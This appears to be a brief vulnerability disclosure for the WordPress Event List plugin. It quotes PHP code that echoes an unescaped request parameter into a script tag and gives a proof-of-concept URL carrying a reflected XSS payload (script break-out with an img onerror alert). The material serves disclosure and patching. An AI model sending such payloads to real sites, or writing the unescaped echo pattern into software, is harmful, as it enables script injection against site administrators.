Software Link: https://wordpress.org/plugins/event-list/
Vulnerability code
event-list/includes/admin-categories.php
$is_disabled = '1' == $this->options->get('el_sync_cats');
require_once(EL_PATH.'admin/includes/category_table.php');
$category_table = new EL_Category_Table($is_disabled);
$category_table->prepare_items();
/event-list/admin/includes/category_table.php
private function process_bulk_action() {
if(!$this->is_disabled) {
//Detect when a bulk action is being triggered...
if( 'delete_bulk' === $this->current_action() ) {
// Show confirmation window before deleting
echo '<script language="JavaScript">eventlist_deleteCategory ("'.implode( ', ', $_GET['slug'] ).'");</script>';
}
}
}
Once user turn off the switch.(Sync Categories)
POC:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_categories&action=delete_bulk&slug[0]=1&slug[1]=2</script><img+src=1+onerror=alert(1)>
